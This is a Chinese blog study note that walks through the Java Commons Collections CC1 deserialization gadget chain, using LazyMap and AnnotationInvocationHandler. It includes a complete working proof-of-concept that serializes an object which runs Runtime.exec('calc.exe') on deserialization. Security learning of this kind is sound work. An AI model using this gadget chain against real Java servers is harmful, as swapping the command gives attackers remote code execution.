Java安全学习笔记--反序列化利用链CC1链(1)

已于 2022-06-05 13:43:17 修改
阅读量1k 收藏 3
点赞数
分类专栏: Java安全 文章标签: java 安全 信息安全 网络安全 web安全
于 2022-01-16 19:09:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64685672/article/details/122526803
版权

测试环境

jdk1.7(jdk7u80)

Commons Collections3.1

预备知识简述

反射

每个类在第一次创建时会生成一个class实例,这个class实例保存着类的所有信息,可以通过:

public Field[] getFields();

//返回类的成员方法

public Method[] getMethods();

//返回类的构造方法

public Constructor<T> getConstructor(Class<?>... parameterTypes);

Class对象中存储类信息的内部静态类

有三种方式获取class实例student.getClass() ,Class.forname(“Strudent类路径”),Student.clsss。

代理

接口类 instance=(接口类)Proxy,newProxyInstance(实例.getclass().classloder(),实例.getClass().getInterfaces(实例实现的所有接口,new invocationHandler{})

JNDI

RMI命名服务

LADP目录服务。。。

利用链核心

这几行代码运行后会直接弹出计算器

Test.java:

public static void main(String[] args) {
    Transformer transformers[]=new Transformer[]{

            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
            new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
    };
    Transformer transformChain= new ChainedTransformer(transformers);
    transformChain.transform("ads");
}

使用到了这几个类

Constantransformer类:

Constantransformer类的构造方法会将输入的类绑定到类变量this.iConstat上,这个类的transform方法会接受一个input但是只会直接返回this.iConstant跟input没有关系

  public ConstantTransformer(Object constantToReturn) {
        this.iConstant = constantToReturn;
    }

    public Object transform(Object input) {
        return this.iConstant;
    }

InvokerTransformer类

InvokerTransformer(要调用的方法,调用方法的形参,调用方法的实参)构造方法

   private InvokerTransformer(String methodName) {
        this.iMethodName = methodName;
        this.iParamTypes = null;
        this.iArgs = null;
    }

transform方法会使用反射(getMethod(方法名,形参))获取方法并返回invoke(实参)调用后的结果,这里注意getMethon返回的是公有方法

public Object transform(Object input) {
        if (input == null) {
            return null;
        } else {
            try {
                Class cls = input.getClass();
                Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
                return method.invoke(input, this.iArgs);
            } catch (NoSuchMethodException var5) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
            } catch (IllegalAccessException var6) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
            } catch (InvocationTargetException var7) {
                throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
            }
        }
    }

ChainedTransformer类

ChainedTransformer会遍历Transforms数组中的元素并调用元素的transform方法

public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }

        return object;
    }

简单写一下Test.java代码执行过程

直接看Test.java最后两行tramsformchain.transform(“asd”),这两行代码把transforms赋值给iTransformers,然后调用了ChainedTransformer的transform函数,开始遍历transforms调用每个元素的transform()

Transformer transformChain= new ChainedTransformer(transformers);

transformChain.transform("ads");
public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }

        return object;
    }

第一次循环:第一个元素是ConstantTransformer(Runtime.class),”ads“这个字符串被传入他的transform方法,返回Runtime.class,object变量变为Runtime.class。

,第二次循环:第二个元素为 invokerTransformer(“getMethod”,…),调用它的transform函数并将Runtime.class传入会返回Runtime.class.getClass().getMethod(“getRuntime”,new Class[0])的调用结果,以上三个类都是实现了Serializable接口的,为了触发核心利用链需要有可以调用transform()的地方。

通过TransformedMap或LazyMap+AnnocationinvocationHandler可以达到在反序列化的时候触发transform()的效果,TransformedMap和LazyMap的构造方法都被protected修饰符修饰不能用new直接实例化,可以通过类内部的方法返回一个实例也可以用反射

Lazymap链

在lazyMap这个类的源码中可以看到一处transform()调用:

同样在源码中找一下this.factory这个变量是否可控,可以看出被public修饰的decorate方法是可以返回一个Lazymap实例的可以通过反射控制factory变量(lazyMap的构造方法使用protected修饰所以不太好利用构造方法控制factory变量),factory可控这样利用链就可以构造出来了。

寻找触发get()函数的触发点

cc1链中Lazymap和transformedMap这两条利用链都是利用AnnotationinvocationHandler类来触发的,AnnotationinvocationHandler实现了invocationHandler接口使得它可以作为newProxyinstance的第三个函数,每次被代理类的函数被触发都会调用AnnotationinvocationHandler的invoke函数, invoke函数中有这么一段代码:

Object var6 = this.memberValues.get(var4);

this.MemberValues是AnnotationinvocationHandler实例化时传入的参数类型为map,所以可控,而AnnotationinvocationHandler的readObject函数中恰好调用了memberValuede的函数,所以可以通过反射将生成的代理类赋值给memberValues,在反序列化的过程中触发readobject函数执行到这行代码时

Iterator var4 = this.memberValues.entrySet().iterator();

触发invoke函数。

调试了一下,Var4获取的是Lazymap.decorate(map,chainedtransformer)时传入的map的迭代器,var5获取到map中的第一个元素,var6获取第一个元素的key。

传入Target.class是为了满足if判断使得我们反射赋值成功,Target.class只继承了Annotation

if (var1.isAnnotation() && var3.length == 1 && var3[0] == Annotation.class) {
    this.type = var1;
    this.memberValues = var2;
}

编写POC

      import org.apache.commons.collections.Transformer;
        import org.apache.commons.collections.functors.ChainedTransformer;
        import org.apache.commons.collections.functors.ConstantTransformer;
        import org.apache.commons.collections.functors.InvokerTransformer;
        import org.apache.commons.collections.map.LazyMap;

        import java.io.*;
        import java.lang.annotation.Target;
        import java.lang.reflect.*;
        import java.util.HashMap;
        import java.util.Map;


public class lazyMapPoc {



    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, IOException {
        Transformer transformers[]=new Transformer[]{

                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
        };
        Transformer transformChain= new ChainedTransformer(transformers);
        Map map =new HashMap();
//        map会被传入到Lazymap父类中去在readObject中被获取迭代器
        Map lazyMap=  LazyMap.decorate(map,transformChain);
        Class classInstance=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");//反射调用
        Constructor constructor=classInstance.getDeclaredConstructor(Class.class,Map.class);
        constructor.setAccessible(true);//setAccessible(true)使得可以访问私有对象
        InvocationHandler annotationInvocationHandler=(InvocationHandler) constructor.newInstance(Target.class,lazyMap);
//        生成代理类需要的InvocationHandler,传入Target.class使得符合annotationInvocationHandler构造函数中的if判断对this.type和this.memberVales赋值
        Map proxyMap= (Map) Proxy.newProxyInstance(Map.class.getClassLoader(),lazyMap.getClass().getInterfaces(),annotationInvocationHandler);
         annotationInvocationHandler=(InvocationHandler) constructor.newInstance(Target.class,proxyMap);//nerInstance返回object需要强制类型转换一下
        ByteArrayOutputStream byteArrayOutputStream=new ByteArrayOutputStream();
        ObjectOutputStream outputStream=new ObjectOutputStream(byteArrayOutputStream);
        outputStream.writeObject(annotationInvocationHandler);
        outputStream.close();
        ByteArrayInputStream  byteArrayInputStream=new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        ObjectInputStream inputStream=new ObjectInputStream(byteArrayInputStream);
        Object object=inputStream.readObject();
    }
}

m0v0
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java安全入门(二)——CC1 分析+详解
weixin_45808483的博客
01-29 1万+
背景 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。 从Apache CommonsCollections 说起。 Apache C...
CC1分析与复现
weixin_42974824的博客
08-16 1443
CC1分析与复现
java学习时长两个半小时的小白手把手教你分析URLDNS利用
Litsasuk的博客
05-07 905
详细分析java反序列化中的URLDNS利用
Commons Collections利用
Townmacro的博客
04-04 786
Commons Collections反序列化利用
commons-collections1(cc1)反序列化分析
遇事不决冲冲冲
01-30 5095
commons-collections1也就是常说的cc1,网上一般有两条子,一个就是ysoserial中的lazymap,还有transformedmap,刚开始碰到cc1子感觉有点麻烦,但只要迈出第一步后面就会挺流畅的,首先在细跟之前一定要有一个大的框架,哪一步完了再跟进到哪一步,像cc1这里主要就是Transformer接口里三个主要的实现类来实现命令执行,然后通过两个不同方法调用执行,即可!
java反序列之CC1
Go_change的博客
05-09 223
序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,就是将对象转换成另一种形式,以方便跨平台存储和网络传输。反序列化则是将上述过程反过来进行的操作。在Java中任何一个对象必须要实现Serializable接口才可以执行序列化和反序列化操作。
java学习笔记-Scokect.pdf
11-29
Java学习笔记-Scoket.pdf Java学习笔记-Scoket.pdf是关于Java编程语言中Socket编程的学习笔记,涵盖了Socket编程的基础知识、Java中Socket的使用、Socket通信的原理及应用等方面的内容。 Socket编程的基础知识 在...
Java中序列化学习笔记/序列和反序列化的实现
05-27
java核心技术-序列化技术
深入理解Java虚拟机---学习感悟以及笔记
01-27
本文来自于cnblogs,为什么要学习Java虚拟机?它能干什么,文章从作者得角度带大家深入Java虚拟机相关内容,希望对大家有帮助。这里我们使用举例来说明为什么要学习Java虚拟机,其实这个问题就和为什么要学习数据结构...
java学习笔记 - 1
08-06
1.java开发环境--java编译运行过程(常见面试题) 2.名词解释--JVM;JRE,JDK 3.配置环境变量 4.eclipse: 开发环境 开发步骤 注释
java学习笔记1 - 初识java.md
最新发布
07-02
java学习笔记1 - 初识java
Java反序列化之CommonsCollections(CC1)基础篇
qq_44029310的博客
11-14 1158
本文包括:Java反序列化之CommonsCollections篇(CC1)的一些基础知识概念。
告别脚本小子系列丨JAVA安全(6)——反序列化利用(上)
C20220511的博客
06-24 1097
我们通常把反序列化漏洞和反序列化利用分开来看,有反序列化漏洞不一定有反序列化利用(经常用shiro反序列化工具的人一定遇到过一种场景就是找到了key,但是找不到gadget,这也就是在这种场景下没有可利用反序列化利用)。如果我们向某个漏洞提交平台提交一个反序列化漏洞,但是不给反序列化利用,那么平台大概率是不会接受这种漏洞的。...
JAVA反序列化CC1分析
Re_ly0n的博客
03-26 5530
反序列化的原理 首先是要继承Serialize类只有继承了这个类菜能够进行序列化,如果某一个类没有继承serialize类并在一条利用中所需要的地方,我们就可以通过反射来进行处理。例如在java中Runtime.getRuntime()是没有继承seralize类的 但是Runtime.class是继承了的 这样以来就可以通过反射来进行序列化和反序列化,反射核心代码如下 上面的代码都是可以成功弹出计算器的。利用的构造尝试使用同名不同类的方法来进行调用。在这里就是复习...
6-java安全——java反序列化漏洞利用
网络安全
07-01 3973
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
cc1学习
lightsec
04-24 1915
前言: 本文主要记录学习cc1的过程,cc1是第一条也是最经典的一条利用,后面几条利用也是基本多多少少利用了这条子,刚接触javacc,过程中有错误理解不对的地方,欢迎师傅们指正 分析过程: 先简单提一下利用是怎么形成的,也便我们好寻找 org.apache.commons.collections.functors Commons Collections 自定义的一组功能类 这组功能类里面有个 ConstantTransformer.java 是一个转换器,里面定义了一个 trans
Java安全学习笔记--反序列化漏洞利用CC2
m0_64685672的博客
01-18 1063
测试环境 jdk1.8(jdk8u71) apache common cellection 4.0 预备知识简述 Javassist动态字节码编程 字节码技术可以动态改变某个类的结构(添加/删除/修改新的属性/方法) 关于字节码的框架有javassist,asm,bcel等,javassist相对简单不需要掌握字节码指令相关知识即可使用。 几个关键的类: ClassPool:ClassPool 类可以控制的类的字节码,例如创建一个类或加载一个类,是CtClass对象集合的容器。一旦C..
Javaweb安全——反序列化漏洞- CC1
weixin_43610673的博客
05-24 1176
Common-Collections利用1 第一次接触反序列化漏洞时写的初识Java反序列化漏洞这篇文章当中已经分析过一遍Common-Collections的两条子(分别用的TransformedMap和LazyMap构造恶意对象反射,AnnotationInvocationHandler(CC1)和BadAttributeValueExpException(CC5)调用transform())。这次从Common-Collections1开始再捋一遍,顺便自己写一遍exp加深印象。 本文环境为jd
java安全】原生反序列化利用JDK7u21
leekos的博客,分享web安全相关知识~
08-03 3026
进行反序列化利用。我们肯定会想,如果不利用第三方类库,能否进行反序列化利用呢?这里还真有:JDK7u21。但是只适用于java 7u及以前的版本在使用这条利用时,需要设置jdk为jdk7u21。
HCIA security 网络安全学习笔记
06-26
HCIA-Security 网络安全学习笔记笔记涵盖了HCIA-Security 认证考试的重要知识点,包括网络安全、USG 模拟器使用、OSI 模型、TCP/IP 模型、各层协议之间的关系等。 **USG 模拟器使用** USG 模拟器是网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值